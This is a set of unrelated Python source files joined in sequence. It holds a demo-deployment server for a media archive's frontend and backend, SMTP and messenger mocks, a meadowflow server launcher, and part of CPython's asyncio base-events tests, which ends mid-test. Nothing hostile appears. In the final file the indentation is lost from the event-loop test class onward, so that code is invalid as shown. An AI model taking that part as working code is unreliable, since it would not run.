    if 'backend_port' in demo:
        kill_backend(name)
        free_backend_port(demo['backend_port'])
        del demo['backend_port']
    # Remove both cloned working directories.
    (returncode, stdout, stderr) = run_command(['rm', '-rf', backend_dir(name)])
    if returncode != 0:
        return 'stderr: %s, stdout: %s' % (stderr, stdout)
    (returncode, stdout, stderr) = run_command(['rm', '-rf', frontend_dir(name)])
    if returncode != 0:
        return 'stderr: %s, stdout: %s' % (stderr, stdout)
    del demos[name]
    print 'stopped and cleaned demo %s' % name
# Register exit cleanup function.
atexit.register(cleanup)
def set_up_frontend(name, branch):
    """Clone, configure, build and start the kmedia-mdb frontend for a demo.

    Returns an error string on failure; falls through to start_frontend()
    (returning None) on success.
    """
    # An existing directory means the demo name is already taken.
    (returncode, stdout, stderr) = run_command(['ls', frontend_dir(name)])
    if returncode == 0:
        return 'Cannot use [%s], already used. stderr: %s, stdout: %s' % (name, stdout, stderr)
    (returncode, stdout, stderr) = run_command(['git', 'clone', 'https://github.com/Bnei-Baruch/kmedia-mdb.git', frontend_dir(name)])
    if returncode != 0:
        return 'stderr: %s, stdout: %s' % (stderr, stdout)
    (returncode, stdout, stderr) = run_command(['git', 'checkout', branch], cwd=frontend_dir(name))
    if returncode != 0:
        return 'stderr: %s, stdout: %s' % (stderr, stdout)
    # Seed the demo env file from the main checkout's .env.
    (returncode, stdout, stderr) = run_command(['cp', '../kmedia-mdb/.env', '%s/.env.demo' % frontend_dir(name)])
    if returncode != 0:
        return 'stderr: %s, stdout: %s' % (stderr, stdout)
    demos[name]['frontend_port'] = get_frontend_port()
    #demos[name]['ssr_frontend_port'] = get_frontend_port()
    # Rewrite the env file to point at this demo's frontend / backend ports.
    (returncode, stdout, stderr) = run_command([
        'sed', '-i', '-E',
        's/REACT_APP_BASE_URL=.*/REACT_APP_BASE_URL=http:\/\/bbdev6.kbb1.com:%d\//g' % demos[name]['frontend_port'],
        '%s/.env.demo' % frontend_dir(name)])
    if returncode != 0:
        return 'stderr: %s, stdout: %s' % (stderr, stdout)
    (returncode, stdout, stderr) = run_command([
        'sed', '-i', '-E',
        's/REACT_APP_API_BACKEND=.*/REACT_APP_API_BACKEND=http:\/\/bbdev6.kbb1.com:%d\//g' % demos[name]['backend_port'],
        '%s/.env.demo' % frontend_dir(name)])
    if returncode != 0:
        return 'stderr: %s, stdout: %s' % (stderr, stdout)
    # Allow the demo backend host in the server's CSP default-src list.
    (returncode, stdout, stderr) = run_command([
        'sed', '-i',
        's/\'default-src\': \[/\'default-src\': [ \'bbdev6.kbb1.com:%d\',/g' % demos[name]['backend_port'],
        '%s/server/app-prod.js' % frontend_dir(name)])
    if returncode != 0:
        return 'stderr: %s, stdout: %s' % (stderr, stdout)
    (returncode, stdout, stderr) = run_command(['yarn', 'install'], cwd=frontend_dir(name))
    if returncode != 0:
        return 'stderr: %s, stdout: %s' % (stderr, stdout)
    # Production build; output captured in build.log inside the checkout.
    (returncode, stdout, stderr) = run_command(['REACT_APP_ENV=demo yarn build >& ./build.log'], cwd=frontend_dir(name), shell=True)
    if returncode != 0:
        return 'stderr: %s, stdout: %s' % (stderr, stdout)
    start_frontend(name)
backend_lock = threading.Lock()
def update_reload(name):
    """Refresh search/es data files for a reindex demo and restart its backend.

    Only applies to demos with elastic == 'reindex'.  Holds backend_lock
    because it temporarily checks out the demo branch in the shared main
    backend checkout.  Returns an error string on failure.
    """
    if demos[name]['elastic'] == 'reindex':
        with backend_lock:
            branch = 'origin/%s' % demos[name]['backend_branch']
            # Determine the currently checked-out branch so it can be restored.
            (returncode, stdout, stderr) = run_command(['git', 'status'])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
            m = re.search(r'# On branch (.*)', stdout)
            if not m:
                print 'git status:\n%s' % stdout
                # Fall back to detached-HEAD output.
                m = re.search(r'# HEAD detached at (.*)', stdout)
                if not m:
                    return 'Failed extracting git current branch.'
            original_branch = m.groups(1)[0]
            (returncode, stdout, stderr) = run_command(['git', 'fetch'])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
            (returncode, stdout, stderr) = run_command(['git', 'checkout', branch])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
            # Copy fresh data files from the main checkout into the demo's.
            (returncode, stdout, stderr) = run_command(['cp', '-rf', './data/search', '%s/data/' % backend_dir(name)])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
            (returncode, stdout, stderr) = run_command(['cp', '-rf', './data/es', '%s/data/' % backend_dir(name)])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
            # Restart the backend so it picks up the new data, then re-apply
            # synonyms to the demo's index.
            kill_backend(name)
            start_backend(name)
            error = start_update_synonyms(name)
            if error:
                demos[name]['status'].append(error)
            # Restore the branch the main checkout was on before we started.
            if original_branch != branch:
                (returncode, stdout, stderr) = run_command(['git', 'checkout', original_branch])
                if returncode != 0:
                    return 'stderr: %s, stdout: %s' % (stderr, stdout)
            demos[name]['status'].append('Updated variables, grammars and synonyms. Reloaded backend.')
def set_up_backend(name):
    """Build, configure and start the archive-backend for demo ``name``.

    Clones nothing: builds in the shared main checkout (under backend_lock,
    temporarily on the demo branch), then copies the binary, config and data
    into a per-demo directory.  Returns an error string on failure, '' on
    success.
    """
    with backend_lock:
        # An existing directory means the demo name is already taken.
        (returncode, stdout, stderr) = run_command(['ls', backend_dir(name)])
        if returncode == 0:
            return 'Cannot use [%s], already used. stderr: %s, stdout: %s' % (name, stdout, stderr)
        # Determine the currently checked-out branch so it can be restored.
        (returncode, stdout, stderr) = run_command(['git', 'status'])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        m = re.search(r'# On branch (.*)', stdout)
        if not m:
            print 'git status:\n%s' % stdout
            # Fall back to detached-HEAD output.
            m = re.search(r'# HEAD detached at (.*)', stdout)
            if not m:
                return 'Failed extracting git current branch.'
        original_branch = m.groups(1)[0]
        (returncode, stdout, stderr) = run_command(['git', 'fetch'])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        branch = 'origin/%s' % demos[name]['backend_branch']
        if original_branch != branch:
            (returncode, stdout, stderr) = run_command(['git', 'checkout', branch])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
        (returncode, stdout, stderr) = run_command(['make', 'build'])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        else:
            demos[name]['status'].append('Backend binary built')
        # Assemble the per-demo directory: binary, config, data and eval page.
        (returncode, stdout, stderr) = run_command(['mkdir', backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        (returncode, stdout, stderr) = run_command(['cp', './archive-backend', backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        (returncode, stdout, stderr) = run_command(['cp', './config.toml', backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        (returncode, stdout, stderr) = run_command(['mkdir', '%s/data' % backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        (returncode, stdout, stderr) = run_command(['mkdir', '%s/data/search' % backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        (returncode, stdout, stderr) = run_command(['mkdir', '%s/data/es' % backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        (returncode, stdout, stderr) = run_command(['mkdir', '%s/search' % backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        (returncode, stdout, stderr) = run_command(['cp', './search/eval.html', '%s/search/' % backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        # Give this demo its own listening port in config.toml.
        demos[name]['backend_port'] = get_backend_port()
        (returncode, stdout, stderr) = run_command([
            'sed', '-i', '-E',
            's/bind-address=\":[0-9]+\"/bind-address=\":%d\"/g' % demos[name]['backend_port'],
            '%s/config.toml' % backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        (returncode, stdout, stderr) = run_command(['cp', '-rf', './data/search', '%s/data/' % backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        (returncode, stdout, stderr) = run_command(['cp', '-rf', './data/es', '%s/data/' % backend_dir(name)])
        if returncode != 0:
            return 'stderr: %s, stdout: %s' % (stderr, stdout)
        if demos[name]['elastic'] == 'reindex':
            # Dedicated indexes: set both index dates to the demo name.
            (returncode, stdout, stderr) = run_command([
                'sed', '-i', '-E',
                's/#index-date.*/index-date = \"%s\"/g' % name,
                '%s/config.toml' % backend_dir(name)])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
            (returncode, stdout, stderr) = run_command([
                'sed', '-i', '-E',
                's/#grammar-index-date.*/grammar-index-date = \"%s\"/g' % name,
                '%s/config.toml' % backend_dir(name)])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
        else:
            # Shared indexes: switch config from the local Elastic block to
            # the production one (comment / uncomment the tagged lines).
            (returncode, stdout, stderr) = run_command([
                'sed', '-i', '-E',
                's/(.*ELASTIC-LOCAL)/#\\1/g',
                '%s/config.toml' % backend_dir(name)])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
            (returncode, stdout, stderr) = run_command([
                'sed', '-i', '-E',
                's/#(.*ELASTIC-PROD)/\\1/g',
                '%s/config.toml' % backend_dir(name)])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
        # Restore the branch the main checkout was on before we started.
        if original_branch != branch:
            (returncode, stdout, stderr) = run_command(['git', 'checkout', original_branch])
            if returncode != 0:
                return 'stderr: %s, stdout: %s' % (stderr, stdout)
        start_backend(name)
        return ''
def set_up_demo(name):
    """Full demo setup pipeline, run on a worker thread.

    Backend -> frontend -> (for 'reindex' demos) indexes, grammars, synonyms.
    Progress and errors are appended to demos[name]['status'] for the UI.
    """
    # Start backend
    print 'Setting up demo: %s.' % demos[name]
    demos[name]['status'].append('Setting up backend')
    error = set_up_backend(name)
    if error:
        demos[name]['status'].append(error)
        return
    else:
        demos[name]['status'].append('Backend set up.')
    # Start frontend
    demos[name]['status'].append('Setting up frontend...')
    error = set_up_frontend(name, demos[name]['frontend_branch'])
    if error:
        demos[name]['status'].append(error)
        return
    # Reindex index, grammars, and update synonyms.
    if demos[name]['elastic'] == 'reindex':
        demos[name]['status'].append('Cleaning existing indexes for [%s]' % name)
        (returncode, stdout, stderr) = delete_indexes(name)
        if returncode != 0:
            # Non-fatal: log and continue with the reindex.
            print 'Failed clening existing indexes: %d %s %s' % (returncode, stdout, stderr)
            demos[name]['status'].append('Failed clening existing indexes: %d' % returncode)
        demos[name]['status'].append('Reindexing ... will take ~20 minutes.')
        error = start_reindex_grammars(name)
        if error:
            demos[name]['status'].append(error)
            return
        demos[name]['status'].append('Grammars indexed successfully.')
        error = start_reindex(name)
        if error:
            demos[name]['status'].append(error)
            return
        demos[name]['status'].append('Indexed everything successfully.')
        error = start_update_synonyms(name)
        if error:
            demos[name]['status'].append(error)
            return
        demos[name]['status'].append('Synonyms updated successfully.')
    demos[name]['status'].append('Done!')
# Queue of demo names waiting to be set up by the worker threads.
start_queue = multiprocessing.JoinableQueue()


def queue_worker():
    """Worker loop: pull a demo name off the queue and run its full setup."""
    # NOTE(review): this is a multiprocessing queue consumed by threads in the
    # same process - it works, but a plain Queue would suffice; confirm intent.
    while True:
        name = start_queue.get()
        set_up_demo(name)
        start_queue.task_done()


# Daemon worker threads so in-flight setups never block interpreter exit.
for i in range(NUM_WORKER_THREADS):
    t = threading.Thread(target=queue_worker)
    t.daemon = True
    t.start()
# Monitor calls
nextCallId = 0
calls = {}
class MonitorCalls:
    """Context manager tracking in-flight HTTP requests.

    Each instance takes a unique call id and registers ``message`` in the
    global ``calls`` table for the duration of the with-block, printing the
    table on entry and exit.
    """

    def __init__(self, message):
        global nextCallId
        global calls
        # NOTE(review): the id counter and table are mutated from multiple
        # handler threads without a lock - confirm races are acceptable here.
        self.callId = nextCallId
        nextCallId += 1
        calls[self.callId] = message

    def __enter__(self):
        self.printCalls('Before')
        return self.callId

    def __exit__(self, type, value, traceback):
        global calls
        del calls[self.callId]
        self.printCalls('After')

    def printCalls(self, prefix):
        """Print the current in-flight call table, flushed immediately."""
        global calls
        print '\n%s - %d Calls:' % (prefix, len(calls))
        for (k, v) in calls.iteritems():
            print '%s - %s' % (k, v)
        print
        sys.stdout.flush()
class DemoHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
    """HTTP handler for the demo manager UI and its small JSON/actions API."""

    def return_response(self, code, message):
        # Minimal response helper: status line, no extra headers, raw body.
        # print 'returning [%d]: [%s]' % (code, message)
        self.send_response(code)
        self.end_headers()
        self.wfile.write(message)

    def do_GET(self):
        """Routes: / (UI page), /status (JSON), /logs/..., /stop_and_clean/..., /update_reload/...."""
        with MonitorCalls(self.path):
            parts = urlparse.urlparse(self.path)
            # print 'get %s' % (parts,)
            if parts.path == '/':
                # Serve the management page via the base class's file serving.
                self.path = './misc/demo.html'
                return SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
            if parts.path == '/status':
                self.return_response(200, json.dumps(demos_to_json()))
                return
            # Serve log files.
            m = re.match(r'^/logs/(%s)/(%s)$' % (NAME_RE, LOG_RE), parts.path)
            if m:
                # NOTE(review): groups(1) passes a default for non-participating
                # groups; both groups always match here, so this is just groups().
                filename = m.groups(1)[1]
                dirname = backend_dir(m.groups(1)[0])
                if filename == 'frontend.log': #or filename == 'ssr_frontend.log':
                    dirname = frontend_dir(m.groups(1)[0])
                path = '%s/%s' % (dirname, filename)
                text = 'Unable to read file'
                # NOTE(review): if open() raises, the exception propagates and
                # the 'Unable to read file' default is never sent - confirm.
                with open(path, 'r') as f:
                    text = f.read()
                self.return_response(200, text)
                return
            m = re.match(r'^/stop_and_clean/(%s)$' % NAME_RE, parts.path)
            if m:
                stop_and_clean(m.groups(1)[0])
            m = re.match(r'^/update_reload/(%s)$' % NAME_RE, parts.path)
            if m:
                update_reload(m.groups(1)[0])
            # Cannot server config.toml as it has passwords insdie...
            # m = re.match(r'^/logs/(%s)/config.toml$' % NAME_RE, parts.path)
            # if m:
            #     path = '%s/config.toml' % backend_dir(m.groups(1)[0])
            #     logs = 'Unable to read config file'
            #     with open(path, 'r') as log_file:
            #         logs = log_file.read()
            #     self.return_response(200, logs)
            #     return

    def do_POST(self):
        """POST /start: validate the JSON request and enqueue demo creation."""
        with MonitorCalls(self.path):
            if self.path == '/start':
                content_length = int(self.headers['Content-Length'])
                body = self.rfile.read(content_length)
                request = json.loads(body)
                print request
                print type(request)
                # All fields must be present and non-empty.
                fields = ['name', 'comment', 'backend_branch', 'frontend_branch', 'elastic']
                missing_fields = [f for f in fields if not request[f]]
                if len(missing_fields):
                    self.return_response(400, 'Please set field values: %s.' % ', '.join(missing_fields))
                    return
                if not re.match(r'^%s$' % NAME_RE, request['name']):
                    self.return_response(400, '"name" should be simple letters, digits or underscore without spaces.')
                    return
                if request['name'] in demos:
                    self.return_response(400, 'Demo with name: [%s] already exist.' % request['name'])
                    return
                # Register the demo and hand it to a worker thread.
                request['status'] = []
                demos[request['name']] = request
                start_queue.put(request['name'])
                # NOTE(review): no end_headers() here, unlike return_response();
                # confirm clients tolerate the header-less 200.
                self.send_response(200)
class ThreadingTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    # Handle each HTTP request on its own thread so long-running actions
    # (stop_and_clean, update_reload) don't block the status endpoint.
    pass


# Allow fast restarts without waiting for TIME_WAIT sockets.
SocketServer.TCPServer.allow_reuse_address = True
httpd = ThreadingTCPServer(("", PORT), DemoHandler)
print "serving at port", PORT
httpd.serve_forever()
# NOTE(review): serve_forever() blocks until shutdown, so this join() is
# effectively unreachable during normal operation.
start_queue.join()
|
mockup.py | import asyncore
import contextlib
import smtpd
import threading
from . import datetimehelpers
from .application import Application
from .messaging import Messenger
@contextlib.contextmanager
def mockup_smtp_server(bind=('localhost', 0)):
    """Context manager yielding a throwaway SMTP server and its (host, port).

    The server discards every message.  It is driven by asyncore.loop() on a
    daemon thread; the sockets are closed when the context exits.
    """
    server_ready = threading.Event()

    class MockupSMTPServer(smtpd.SMTPServer):

        def __init__(self, bind):
            super().__init__(bind, None, decode_data=False)
            # Resolve the OS-assigned port (the default bind uses port 0).
            self.server_address = self.socket.getsockname()[:2]
            server_ready.set()

        def process_message(*args, **kwargs):
            # Swallow all incoming mail.
            pass

    server = MockupSMTPServer(bind)
    thread = threading.Thread(target=asyncore.loop, daemon=True)
    thread.start()
    server_ready.wait()
    try:
        yield server, server.server_address
    finally:
        # try/finally guarantees the sockets are closed even when the
        # with-body raises (the original skipped close_all() on exception).
        asyncore.close_all()
class MockupMessenger(Messenger):
    """Messenger double that records the last message instead of sending it."""

    # Stored on the class so every instance (and test code) sees the same
    # most-recently "sent" message.
    _last_message = None

    @property
    def last_message(self):
        return self.__class__._last_message

    @last_message.setter
    def last_message(self, value):
        self.__class__._last_message = value

    def send(
            self,
            to, subject, body,
            cc=None,
            bcc=None,
            template_string=None,
            template_filename=None,
            from_=None,
            attachments=None
    ):
        """Record to/subject/body; all other Messenger.send fields are ignored."""
        self.last_message = {
            'to': to,
            'body': body,
            'subject': subject
        }
@contextlib.contextmanager
def mockup_localtimezone(timezone):
    """Temporarily replace datetimehelpers.localtimezone with ``timezone``.

    ``timezone`` may be a value or a callable returning one; the original
    factory is restored on exit, including when the with-body raises.
    """
    backup = datetimehelpers.localtimezone
    datetimehelpers.localtimezone = timezone if callable(timezone) \
        else lambda: timezone
    try:
        yield
    finally:
        # try/finally guarantees restoration; the original implementation
        # left the patch in place when the with-body raised.
        datetimehelpers.localtimezone = backup
|
server_main.py | """A runnable script for running a meadowflow server"""
import asyncio
import contextlib
import logging
import multiprocessing
from typing import Iterator, Optional
import meadowflow.server.server
from meadowflow.scheduler import Scheduler
from meadowflow.server.config import DEFAULT_HOST, DEFAULT_PORT
async def start(host: str, port: int, job_runner_poll_delay_seconds: float) -> None:
    """Run a scheduler and serve it via the meadowflow server on host:port."""
    # The async with block guarantees scheduler shutdown when serving ends.
    async with Scheduler(job_runner_poll_delay_seconds) as scheduler:
        await meadowflow.server.server.start_meadowflow_server(scheduler, host, port)
def main(
    host: str = DEFAULT_HOST,
    port: int = DEFAULT_PORT,
    job_runner_poll_delay_seconds: float = Scheduler._JOB_RUNNER_POLL_DELAY_SECONDS,
) -> None:
    """A function for running a meadowflow server.

    Blocks until the server's event loop exits.
    """
    asyncio.run(start(host, port, job_runner_poll_delay_seconds))
@contextlib.contextmanager
def main_in_child_process(
    host: str = DEFAULT_HOST,
    port: int = DEFAULT_PORT,
    job_runner_poll_delay_seconds: float = Scheduler._JOB_RUNNER_POLL_DELAY_SECONDS,
) -> Iterator[Optional[int]]:
    """
    Launch server in a child process. Usually for unit tests. For debugging, it's better
    to just run server_main.py manually as a standalone process so you can debug it, see
    logs, etc. If there's an existing server already running, the child process will
    just die immediately without doing anything.

    Yields the child process's pid; the child is terminated on exit.
    """
    ctx = multiprocessing.get_context("spawn")
    server_process = ctx.Process(
        target=main, args=(host, port, job_runner_poll_delay_seconds)
    )
    server_process.start()
    try:
        logging.info(f"Process started. Pid: {server_process.pid}")
        yield server_process.pid
    finally:
        server_process.terminate()
        logging.info("Process terminated. Waiting up to 5 seconds for exit...")
        server_process.join(5)
        if server_process.is_alive():
            # terminate() was ignored; force-kill and reap to avoid a zombie.
            logging.info("Process alive after termination, killing.")
            server_process.kill()
            server_process.join()
        # exitcode is None while the process is alive, so only log it after
        # the liveness check (the original logged it before, printing None).
        logging.info(f"Process exited with code {server_process.exitcode}")
def command_line_main() -> None:
    """Command-line entry point: run the server with INFO-level logging."""
    logging.basicConfig(level=logging.INFO)
    main()


if __name__ == "__main__":
    command_line_main()
|
test_base_events.py | """Tests for base_events.py"""
import concurrent.futures
import errno
import math
import os
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def tearDownModule():
    # Reset the global event loop policy so later test modules start clean.
    asyncio.set_event_loop_policy(None)
def mock_socket_module():
    """Return a MagicMock standing in for the ``socket`` module.

    The real AF_*/SOCK_*/IPPROTO_* constants (and inet_pton) are copied over
    when the platform provides them and removed otherwise; socket() yields a
    non-blocking mock socket, and getaddrinfo is marked non-coroutine so the
    event loop treats it as a plain callable.
    """
    fake_socket = mock.MagicMock(spec=socket)
    mirrored_names = (
        'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
        'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton',
    )
    for attr in mirrored_names:
        if hasattr(socket, attr):
            setattr(fake_socket, attr, getattr(socket, attr))
        else:
            delattr(fake_socket, attr)
    fake_socket.socket = mock.MagicMock()
    fake_socket.socket.return_value = test_utils.mock_nonblocking_socket()
    fake_socket.getaddrinfo._is_coroutine = False
    return fake_socket
def patch_socket(f):
    # Decorator: run *f* with asyncio.base_events.socket replaced by the mock
    # module from mock_socket_module(); the mock is passed as an extra arg.
    return mock.patch('asyncio.base_events.socket',
                      new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
    """Tests for the _ipaddr_info() fast-path resolver in asyncio.base_events."""

    def test_ipaddr_info(self):
        UNSPEC = socket.AF_UNSPEC
        INET = socket.AF_INET
        INET6 = socket.AF_INET6
        STREAM = socket.SOCK_STREAM
        DGRAM = socket.SOCK_DGRAM
        TCP = socket.IPPROTO_TCP
        UDP = socket.IPPROTO_UDP
        # A literal IPv4 host resolves without DNS to a getaddrinfo-style tuple.
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
        # Bytes hosts are accepted too.
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
        # AF_UNSPEC narrows to the address's actual family.
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
        self.assertEqual(
            (INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
        # Socket type STREAM implies TCP protocol.
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
        # Socket type DGRAM implies UDP protocol.
        self.assertEqual(
            (INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
        # No socket type.
        self.assertIsNone(
            base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
        if not support.IPV6_ENABLED:
            return
        # IPv4 address with family IPv6.
        self.assertIsNone(
            base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
        self.assertEqual(
            (INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
            base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
        self.assertEqual(
            (INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
            base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
        # IPv6 address with family IPv4.
        self.assertIsNone(
            base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
        # IPv6 address with zone index.
        self.assertIsNone(
            base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))

    def test_port_parameter_types(self):
        # Test obscure kinds of arguments for "port".
        INET = socket.AF_INET
        STREAM = socket.SOCK_STREAM
        TCP = socket.IPPROTO_TCP
        # None and empty str/bytes ports fall back to port 0.
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 0)),
            base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 0)),
            base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 0)),
            base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
        # Numeric strings/bytes are converted to integers.
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
        self.assertEqual(
            (INET, STREAM, TCP, '', ('1.2.3.4', 1)),
            base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))

    @patch_socket
    def test_ipaddr_info_no_inet_pton(self, m_socket):
        # Without inet_pton the fast path cannot validate the literal address.
        del m_socket.inet_pton
        self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
                                                   socket.AF_INET,
                                                   socket.SOCK_STREAM,
                                                   socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
class DummyExecutor(concurrent.futures.ThreadPoolExecutor):
def submit(self, fn, *args, **kwargs):
raise NotImplementedError(
'cannot submit into a dummy executor')
executor = DummyExecutor()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_set_default_executor_deprecation_warnings(self):
executor = mock.Mock()
with self.assertWarns(DeprecationWarning):
self.loop.set_default_executor(executor)
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
